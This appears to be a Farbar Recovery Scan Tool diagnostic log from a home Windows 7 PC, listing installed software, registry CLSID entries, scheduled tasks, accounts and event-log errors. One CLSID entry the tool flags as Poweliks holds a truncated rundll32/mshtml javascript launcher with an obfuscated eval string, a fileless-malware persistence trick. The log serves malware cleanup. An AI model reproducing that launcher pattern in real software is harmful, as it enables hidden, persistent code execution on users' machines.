Additional scan result of Farbar Recovery Scan Tool (x64) Version: 11-12-2014 03 Ran by Jeff at 2014-12-12 09:21:42 Running from C:\Users\Jeff\Desktop Boot Mode: Normal ========================================================== ==================== Security Center ======================== (If an entry is included in the fixlist, it will be removed.) AV: avast! Antivirus (Enabled - Up to date) {17AD7D40-BA12-9C46-7131-94903A54AD8B} AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AS: avast! Antivirus (Enabled - Up to date) {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736} FW: avast! Antivirus (Enabled) {2F96FC65-F07D-9D1E-5A6E-3DA5C487EAF0} ==================== Installed Programs ====================== (Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.) 4500_Help (x32 Version: 1.00.0000 - Hewlett-Packard) Hidden 64 Bit HP CIO Components Installer (Version: 6.2.1 - Hewlett-Packard) Hidden ACORD Viewer 6.1 (HKLM-x32\...\{E0000610-0610-0610-0610-000000000610}) (Version: - ) Adobe Flash Player 15 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 15.0.0.246 - Adobe Systems Incorporated) Adobe Reader 9.5.5 (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-A95000000001}) (Version: 9.5.5 - Adobe Systems Incorporated) Avast Internet Security (HKLM-x32\...\Avast) (Version: 10.0.2208 - AVAST Software) bpd_scan (x32 Version: 3.00.0000 - Hewlett-Packard) Hidden BPDSoftware (x32 Version: 50.0.165.000 - Hewlett-Packard) Hidden BPDSoftware_Ini (x32 Version: 1.00.0000 - Hewlett-Packard) Hidden Brother MFL-Pro Suite DCP-7065DN (HKLM-x32\...\{3ACCCFB3-7B17-4E9F-ACB0-46868FCD4487}) (Version: 1.1.3.0 - Brother Industries, Ltd.) BufferChm (x32 Version: 130.0.331.000 - Hewlett-Packard) Hidden Citrix Receiver (HKLM-x32\...\CitrixOnlinePluginPackWeb) (Version: 13.4.0.25 - Citrix Systems, Inc.) Compatibility Pack for the 2007 Office system (HKLM-x32\...\{90120000-0020-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation) D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden DirectX for Managed Code Update (Summer 2004) (x32 Version: 9.02.2904 - Microsoft) Hidden Dropbox (HKU\S-1-5-21-2534424839-3201483776-2275768760-1001\...\Dropbox) (Version: 3.0.3 - Dropbox, Inc.) FLV Player (HKU\S-1-5-21-2534424839-3201483776-2275768760-1001\...\FLV Player) (Version: - ) Google Chrome (HKLM-x32\...\Google Chrome) (Version: 39.0.2171.71 - Google Inc.) Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.5111.1712 - Google Inc.) Google Toolbar for Internet Explorer (x32 Version: 1.0.0 - Google Inc.) Hidden Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden GoToAssist Corporate (HKLM-x32\...\GoToAssist) (Version: 10.0.0.759 - Citrix Online, a division of Citrix Systems, Inc.) Hewlett-Packard ACLM.NET v1.2.1.1 (x32 Version: 1.00.0000 - Hewlett-Packard Company) Hidden Hoyle Casino (HKLM-x32\...\{3F99D180-34C3-4151-8C6C-86FC5D7BDFBD}) (Version: 1.0.0 - Encore) HP Games (HKLM-x32\...\WildTangent hp Master Uninstall) (Version: 1.0.2.5 - WildTangent) HP Odometer (HKLM-x32\...\{B8AC1A89-FFD1-4F97-8051-E505A160F562}) (Version: 2.10.0000 - Hewlett-Packard) HP Officejet J4500 Series (HKLM\...\{E11448F2-0B44-4239-B04E-D88FE743E929}) (Version: 13.0 - HP) HP Setup (HKLM-x32\...\{438363A8-F486-4C37-834C-4955773CB3D3}) (Version: 9.1.15430.4033 - Hewlett-Packard Company) HP Support Assistant (HKLM-x32\...\{EE202411-2C26-49E8-9784-1BC1DBF7DE96}) (Version: 7.0.39.15 - Hewlett-Packard Company) HP Support Information (HKLM-x32\...\{B2B7B1C8-7C8B-476C-BE2C-049731C55992}) (Version: 11.00.0001 - Hewlett-Packard) Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.0.0.1351 - Intel Corporation) Intel(R) OpenCL CPU Runtime (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version: - Intel Corporation) Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2696 - Intel Corporation) J4500 (x32 Version: 50.0.165.000 - Hewlett-Packard) Hidden Junk Mail filter update (x32 Version: 16.4.3505.0912 - Microsoft Corporation) Hidden Malwarebytes Anti-Malware version 2.0.2.1012 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.2.1012 - Malwarebytes Corporation) Microsoft .NET Framework 4 Client Profile (HKLM\...\Microsoft .NET Framework 4 Client Profile) (Version: 4.0.30319 - Microsoft Corporation) Microsoft .NET Framework 4 Extended (HKLM\...\Microsoft .NET Framework 4 Extended) (Version: 4.0.30319 - Microsoft Corporation) Microsoft Office Basic Edition 2003 (HKLM-x32\...\{91130409-6000-11D3-8CFE-0150048383C9}) (Version: 11.0.8173.0 - Microsoft Corporation) Microsoft Office File Validation Add-In (HKLM-x32\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation) Microsoft Office Live Meeting 2007 (HKLM-x32\...\{0309B99E-C7EA-414C-AC53-A78061277595}) (Version: 8.0.6362.223 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) MSVCRT110_amd64 (Version: 16.4.1109.0912 - Microsoft) Hidden MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation) MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation) Online Plug-in (x32 Version: 13.4.0.25 - Citrix Systems, Inc.) Hidden opensource (x32 Version: 1.0.14960.3876 - Your Company Name) Hidden PDF Complete Corporate Edition (HKLM-x32\...\PDF Complete) (Version: 4.1.9 - PDF Complete, Inc) Photo Common (x32 Version: 16.4.3505.0912 - Microsoft Corporation) Hidden PlayReady PC Runtime amd64 (HKLM\...\{BCA9334F-B6C9-4F65-9A73-AC5A329A4D04}) (Version: 1.3.0 - Microsoft Corporation) Polar Bowler (x32 Version: 2.2.0.97 - WildTangent) Hidden Polar Golfer (x32 Version: 2.2.0.98 - WildTangent) Hidden Power2Go (HKLM-x32\...\InstallShield_{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 6.1.6207 - CyberLink Corp.) Power2Go (x32 Version: 6.1.6207 - CyberLink Corp.) Hidden ProductContext (x32 Version: 50.0.165.000 - Hewlett-Packard) Hidden Ralink RT5390R 802.11bgn 1x1 Wi-Fi Adapter (HKLM-x32\...\{8FC4F1DD-F7FD-4766-804D-3C8FF1D309AF}) (Version: 3.2.12.0 - Ralink) Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6463 - Realtek Semiconductor Corp.) Recovery Manager (x32 Version: 5.5.0.5223 - CyberLink Corp.) Hidden Scan (x32 Version: 13.0.0.0 - Hewlett-Packard) Hidden Self-service Plug-in (x32 Version: 3.4.0.33684 - Citrix Systems, Inc.) Hidden Spybot - Search & Destroy (HKLM-x32\...\{B4092C6D-E886-4CB2-BA68-FE5A88D31DE6}_is1) (Version: 1.6.2 - Safer Networking Limited) Texas Hold 'Em: High Stakes Poker (HKLM-x32\...\{C3B95659-26C3-4448-8891-5E713F978F74}) (Version: 1.00.0000 - ValuSoft) Toolbox (x32 Version: 130.0.648.000 - Hewlett-Packard) Hidden Update Installer for WildTangent Games App (x32 Version: - WildTangent) Hidden WebReg (x32 Version: 130.0.132.017 - Hewlett-Packard) Hidden WildTangent Games App (HP Games) (x32 Version: 4.0.5.36 - WildTangent) Hidden Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3505.0912 - Microsoft Corporation) WinZip 16.0 (HKLM\...\{CD95F661-A5C4-44F5-A6AA-ECDD91C240CD}) (Version: 16.0.9715 - WinZip Computing, S.L. ) Youda Fisherman (x32 Version: 2.2.0.98 - WildTangent) Hidden ==================== Custom CLSID (selected items): ========================== (If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.) CustomCLSID: HKU\S-1-5-21-2534424839-3201483776-2275768760-1001_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\Jeff\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-2534424839-3201483776-2275768760-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 251 more characters). <==== Poweliks? CustomCLSID: HKU\S-1-5-21-2534424839-3201483776-2275768760-1001_Classes\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Jeff\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-2534424839-3201483776-2275768760-1001_Classes\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Jeff\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-2534424839-3201483776-2275768760-1001_Classes\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Jeff\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-2534424839-3201483776-2275768760-1001_Classes\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Jeff\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-2534424839-3201483776-2275768760-1001_Classes\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Jeff\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-2534424839-3201483776-2275768760-1001_Classes\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Jeff\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-2534424839-3201483776-2275768760-1001_Classes\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Jeff\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-2534424839-3201483776-2275768760-1001_Classes\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Jeff\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll (Dropbox, Inc.) ==================== Restore Points ========================= 12-11-2014 15:16:28 Device Driver Package Install: Avast Network Service 12-11-2014 16:58:32 Windows Update 18-11-2014 13:05:04 Windows Update 19-11-2014 16:59:27 Windows Update 25-11-2014 19:25:14 Windows Update 02-12-2014 19:43:09 Windows Update 09-12-2014 13:23:25 Windows Update 10-12-2014 17:04:49 Windows Update ==================== Hosts content: ========================== (If needed Hosts: directive could be included in the fixlist to reset Hosts.) 2009-07-13 21:34 - 2014-12-12 08:37 - 00000098 ____A C:\Windows\system32\Drivers\etc\hosts 127.0.0.1 localhost ::1 localhost ==================== Scheduled Tasks (whitelisted) ============= (If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.) Task: {182FF9C8-36DF-45C2-B409-75CCA3C2FDDC} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2012-09-27] (Hewlett-Packard Company) Task: {3ADA5B65-2F54-4A97-9D43-13B28E7D0EBA} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2013-12-16] (Google Inc.) Task: {526CEBD2-CDC4-43C3-ABB6-677E728602F2} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2012-09-27] (Hewlett-Packard Company) Task: {7538F82B-BC16-4A58-B06B-FD3A3402297B} - System32\Tasks\avast! Emergency Update => C:\Program Files\AVAST Software\Avast\AvastEmUpdate.exe [2014-11-12] (AVAST Software) Task: {7E143D76-FC54-4CE4-B945-B20FD8D23832} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-12-10] (Adobe Systems Incorporated) Task: {8204B2A2-1CF5-4026-8072-7DAB458077BB} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2013-12-16] (Google Inc.) Task: {82DEE6C3-3DCF-4E66-B627-D574709AFF53} - System32\Tasks\HPCeeScheduleForJeff => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2011-07-15] (Hewlett-Packard) Task: {CD8A0460-C77B-4833-AF7F-0062DA040223} - System32\Tasks\DTReg => C:\Users\Jeff\AppData\Roaming\DefaultTab\DefaultTab\DTReg.exe <==== ATTENTION Task: {E1B9D811-1493-4190-814A-EFC6D162C0A5} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Update Check => C:\ProgramData\Hewlett-Packard\HP Support Framework\Resources\Updater7\HPSFUpdater.exe [2014-05-12] (Hewlett-Packard Company) Task: {F259FEFE-0A3A-475B-A664-B16AF8C28835} - System32\Tasks\Microsoft\Microsoft Antimalware\Microsoft Antimalware Scheduled Scan => c:\Program Files\Microsoft Security Client\MpCmdRun.exe Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\HPCeeScheduleForJeff.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe ==================== Loaded Modules (whitelisted) ============= 2012-04-04 21:46 - 2012-04-04 21:46 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll 2014-12-11 08:22 - 2014-12-11 08:22 - 02905600 _____ () C:\Program Files\AVAST Software\Avast\defs\14121100\algo.dll 2014-11-12 10:15 - 2014-11-12 10:15 - 38562088 _____ () C:\Program Files\AVAST Software\Avast\libcef.dll 2014-07-28 14:18 - 2009-02-27 15:38 - 00139264 ____R () C:\Program Files (x86)\Brother\BrUtilities\BrLogAPI.dll 2014-10-21 19:22 - 2014-10-21 19:22 - 00750080 _____ () C:\Users\Jeff\AppData\Roaming\Dropbox\bin\libGLESv2.dll 2014-12-12 09:16 - 2014-12-12 09:16 - 00043008 _____ () c:\users\jeff\appdata\local\temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpltcfej.dll 2014-10-21 19:22 - 2014-10-21 19:22 - 00047616 _____ () C:\Users\Jeff\AppData\Roaming\Dropbox\bin\libEGL.dll 2014-10-21 19:22 - 2014-10-21 19:22 - 00863744 _____ () C:\Users\Jeff\AppData\Roaming\Dropbox\bin\plugins\platforms\qwindows.dll 2014-10-21 19:22 - 2014-10-21 19:22 - 00200704 _____ () C:\Users\Jeff\AppData\Roaming\Dropbox\bin\plugins\imageformats\qjpeg.dll ==================== Alternate Data Streams (whitelisted) ========= (If an entry is included in the fixlist, only the Alternate Data Streams will be removed.) AlternateDataStreams: C:\Users\Jeff\Documents\DSC_6874.jpg:com.dropbox.attributes ==================== Safe Mode (whitelisted) =================== (If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\GoToAssist => ""="Service" ==================== EXE Association (whitelisted) ============= (If an entry is included in the fixlist, the default will be restored. None default entries will be removed.) ==================== MSCONFIG/TASK MANAGER disabled items ========= (Currently there is no automatic fix for this section.) ========================= Accounts: ========================== Administrator (S-1-5-21-2534424839-3201483776-2275768760-500 - Administrator - Disabled) Guest (S-1-5-21-2534424839-3201483776-2275768760-501 - Limited - Disabled) HomeGroupUser$ (S-1-5-21-2534424839-3201483776-2275768760-1002 - Limited - Enabled) Jeff (S-1-5-21-2534424839-3201483776-2275768760-1001 - Administrator - Enabled) => C:\Users\Jeff ==================== Faulty Device Manager Devices ============= ==================== Event log errors: ========================= Application errors: ================== Error: (12/11/2014 04:52:36 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: iexplore.exe, version: 9.0.8112.16599, time stamp: 0x4a5bc637 Faulting module name: MSHTML.dll, version: 9.0.8112.16599, time stamp: 0x547397d5 Exception code: 0xc0000005 Fault offset: 0x00260bce Faulting process id: 0x7218 Faulting application start time: 0xiexplore.exe0 Faulting application path: iexplore.exe1 Faulting module path: iexplore.exe2 Report Id: iexplore.exe3 Error: (12/11/2014 03:19:58 PM) (Source: Application Hang) (EventID: 1002) (User: ) Description: The program OTL.exe version 3.2.69.0 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel. Process ID: 5260 Start Time: 01d0157e90e0921d Termination Time: 35 Application Path: C:\Users\Jeff\Desktop\OTL.exe Report Id: Error: (12/11/2014 10:16:58 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: wlmail.exe, version: 16.4.3505.912, time stamp: 0x50510ef6 Faulting module name: MSMAIL.DLL, version: 16.4.3505.912, time stamp: 0x5051109d Exception code: 0xc0000005 Fault offset: 0x00007528 Faulting process id: 0x%9 Faulting application start time: 0xwlmail.exe0 Faulting application path: wlmail.exe1 Faulting module path: wlmail.exe2 Report Id: wlmail.exe3 Error: (12/10/2014 11:22:30 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: iexplore.exe, version: 9.0.8112.16592, time stamp: 0x544e95a7 Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000 Exception code: 0xc000041d Fault offset: 0x0de63858 Faulting process id: 0xc84 Faulting application start time: 0xiexplore.exe0 Faulting application path: iexplore.exe1 Faulting module path: iexplore.exe2 Report Id: iexplore.exe3 Error: (12/10/2014 11:22:27 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: iexplore.exe, version: 9.0.8112.16592, time stamp: 0x544e95a7 Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000 Exception code: 0xc0000005 Fault offset: 0x0de63858 Faulting process id: 0xc84 Faulting application start time: 0xiexplore.exe0 Faulting application path: iexplore.exe1 Faulting module path: iexplore.exe2 Report Id: iexplore.exe3 Error: (12/10/2014 11:17:58 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: iexplore.exe, version: 9.0.8112.16592, time stamp: 0x544e95a7 Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000 Exception code: 0xc0000005 Fault offset: 0x44332576 Faulting process id: 0xe80 Faulting application start time: 0xiexplore.exe0 Faulting application path: iexplore.exe1 Faulting module path: iexplore.exe2 Report Id: iexplore.exe3 Error: (12/10/2014 08:33:22 AM) (Source: Application Hang) (EventID: 1002) (User: ) Description: The program iexplore.exe version 9.0.8112.16592 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel. Process ID: 1c0 Start Time: 01d0147dcb14fc0e Termination Time: 0 Application Path: C:\Program Files (x86)\Internet Explorer\iexplore.exe Report Id: Error: (12/09/2014 00:38:28 PM) (Source: Application Hang) (EventID: 1002) (User: ) Description: The program iexplore.exe version 9.0.8112.16592 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel. Process ID: 50d8 Start Time: 01d013d668091fb9 Termination Time: 16 Application Path: C:\Program Files (x86)\Internet Explorer\iexplore.exe Report Id: Error: (12/09/2014 10:00:15 AM) (Source: SideBySide) (EventID: 63) (User: ) Description: Activation context generation failed for "assemblyIdentity1".Error in manifest or policy file "assemblyIdentity2" on line assemblyIdentity3. The value "*" of attribute "language" in element "assemblyIdentity" is invalid. Error: (12/09/2014 08:38:35 AM) (Source: Application Hang) (EventID: 1002) (User: ) Description: The program iexplore.exe version 9.0.8112.16592 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel. Process ID: 1538 Start Time: 01d013b546f56a87 Termination Time: 0 Application Path: C:\Program Files (x86)\Internet Explorer\iexplore.exe Report Id: a928129c-7fa8-11e4-8f09-6c3be51af358 System errors: ============= Error: (12/12/2014 09:03:06 AM) (Source: DCOM) (EventID: 10010) (User: ) Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} Error: (12/12/2014 09:02:13 AM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: The vToolbarUpdater17.3.0 service failed to start due to the following error: %%2 Error: (12/12/2014 09:02:13 AM) (Source: Service Control Manager) (EventID: 7009) (User: ) Description: A timeout was reached (30000 milliseconds) while waiting for the Ralink UPnP Media Server service to connect. Error: (12/12/2014 09:01:43 AM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: The PasswordBox service failed to start due to the following error: %%1053 Error: (12/12/2014 09:01:43 AM) (Source: Service Control Manager) (EventID: 7009) (User: ) Description: A timeout was reached (30000 milliseconds) while waiting for the PasswordBox service to connect. Error: (12/12/2014 08:58:15 AM) (Source: Service Control Manager) (EventID: 7001) (User: ) Description: The Computer Browser service depends on the Server service which failed to start because of the following error: %%1068 Error: (12/12/2014 08:58:15 AM) (Source: Service Control Manager) (EventID: 7001) (User: ) Description: The Computer Browser service depends on the Server service which failed to start because of the following error: %%1068 Error: (12/12/2014 08:58:15 AM) (Source: Service Control Manager) (EventID: 7001) (User: ) Description: The Computer Browser service depends on the Server service which failed to start because of the following error: %%1068 Error: (12/12/2014 08:56:09 AM) (Source: Service Control Manager) (EventID: 7001) (User: ) Description: The Computer Browser service depends on the Server service which failed to start because of the following error: %%1068 Error: (12/12/2014 08:56:09 AM) (Source: Service Control Manager) (EventID: 7001) (User: ) Description: The Computer Browser service depends on the Server service which failed to start because of the following error: %%1068 Microsoft Office Sessions: ========================= Error: (12/11/2014 04:52:36 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: iexplore.exe9.0.8112.165994a5bc637MSHTML.dll9.0.8112.16599547397d5c000000500260bce721801d0158ca1fa10b3C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dll045d1839-8180-11e4-b62b-6c3be51af358 Error: (12/11/2014 03:19:58 PM) (Source: Application Hang) (EventID: 1002) (User: ) Description: OTL.exe3.2.69.0526001d0157e90e0921d35C:\Users\Jeff\Desktop\OTL.exe Error: (12/11/2014 10:16:58 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: wlmail.exe16.4.3505.91250510ef6MSMAIL.DLL16.4.3505.9125051109dc000000500007528 Error: (12/10/2014 11:22:30 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: iexplore.exe9.0.8112.16592544e95a7unknown0.0.0.000000000c000041d0de63858c8401d01494e0dea62fC:\Program Files (x86)\Internet Explorer\iexplore.exeunknownbc8ec906-8088-11e4-8f21-6c3be51af358 Error: (12/10/2014 11:22:27 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: iexplore.exe9.0.8112.16592544e95a7unknown0.0.0.000000000c00000050de63858c8401d01494e0dea62fC:\Program Files (x86)\Internet Explorer\iexplore.exeunknownbb051603-8088-11e4-8f21-6c3be51af358 Error: (12/10/2014 11:17:58 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: iexplore.exe9.0.8112.16592544e95a7unknown0.0.0.000000000c000000544332576e8001d01490eecb67f9C:\Program Files (x86)\Internet Explorer\iexplore.exeunknown1a54da3e-8088-11e4-8f21-6c3be51af358 Error: (12/10/2014 08:33:22 AM) (Source: Application Hang) (EventID: 1002) (User: ) Description: iexplore.exe9.0.8112.165921c001d0147dcb14fc0e0C:\Program Files (x86)\Internet Explorer\iexplore.exe Error: (12/09/2014 00:38:28 PM) (Source: Application Hang) (EventID: 1002) (User: ) Description: iexplore.exe9.0.8112.1659250d801d013d668091fb916C:\Program Files (x86)\Internet Explorer\iexplore.exe Error: (12/09/2014 10:00:15 AM) (Source: SideBySide) (EventID: 63) (User: ) Description: assemblyIdentitylanguage*c:\program files (x86)\spybot - search & destroy\DelZip179.dllc:\program files (x86)\spybot - search & destroy\DelZip179.dll8 Error: (12/09/2014 08:38:35 AM) (Source: Application Hang) (EventID: 1002) (User: ) Description: iexplore.exe9.0.8112.16592153801d013b546f56a870C:\Program Files (x86)\Internet Explorer\iexplore.exea928129c-7fa8-11e4-8f09-6c3be51af358 ==================== Memory info =========================== Processor: Intel(R) Pentium(R) CPU G870 @ 3.10GHz Percentage of memory in use: 61% Total physical RAM: 3979.05 MB Available physical RAM: 1551.36 MB Total Pagefile: 7956.29 MB Available Pagefile: 4474.38 MB Total Virtual: 8192 MB Available Virtual: 8191.8 MB ==================== Drives ================================ Drive c: (OS) (Fixed) (Total:450.77 GB) (Free:400.97 GB) NTFS Drive d: (HP_RECOVERY) (Fixed) (Total:14.8 GB) (Free:1.75 GB) NTFS ==>[System with boot components (obtained from reading drive)] ==================== MBR & Partition Table ================== ======================================================== Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: D216D0AF) Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS) Partition 2: (Not Active) - (Size=450.8 GB) - (Type=07 NTFS) Partition 3: (Not Active) - (Size=14.8 GB) - (Type=07 NTFS) Partition 4: (Not Active) - (Size=101 MB) - (Type=27) ==================== End Of Log ============================